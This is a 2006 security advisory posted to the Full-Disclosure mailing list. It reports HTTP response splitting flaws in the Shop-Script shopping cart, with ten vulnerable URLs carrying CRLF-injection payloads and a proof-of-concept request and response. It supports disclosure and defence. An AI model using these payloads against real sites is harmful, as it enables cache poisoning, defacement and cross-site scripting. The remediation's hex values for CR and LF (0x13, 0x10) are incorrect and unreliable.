lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <bb5da2a80610231146v3e06c5c4sc09887de8778122a@mail.gmail.com>
Date: Mon, 23 Oct 2006 11:46:09 -0700
From: "Debasis Mohanty" <debasis.mohanty.listmails@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Multiple HTTP response splitting vulnerabilities
	in SHOP-SCRIPT

Vendor:  Shop-Script (a division of WebAsyst LLC)
Application: Shop-Script (www.shop-script.com)

I. Descriptions:
Shop-Script is a PHP based shopping cart. Multiple links of
shop-script are vulnerable to a new form of application attack
technique called HTTP Response splitting (aka CRLF Injection). HTTP
Response Splitting enables an attacker to alter the HTTP response
header structure which can leads to various range of attacks such as
web cache poisoning, temporary defacement, hijacking pages or
cross-site scripting (XSS). This happens since the user input is
injected into the value section of http header without properly
escaping/removing CRLF characters which can leads to two HTTP
responses instead of one response.


II. Affected Links:
POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&amp;save_voting_results=yes
HTTP/1.0
POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?searchstring=<any_keyword>&amp;inside=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0



III. Proof-of-concept:

[Request Header]

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
CLR 1.1.4322)
Host: www.shop-script-demo.com
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1


[Response Header]

HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header			<= [Custome remsponse injected by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html



IV. Remediation:
Sanitize CR(0x13) and LF(0x10) from the user input or properly encode
the output in order to prevent the injection of custom

HTTP headers.



V. Reference:
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html



VI. Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com


For more vulnerabilities visit -
http://hackingspirits.com/vuln-rnd/vuln-rnd.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ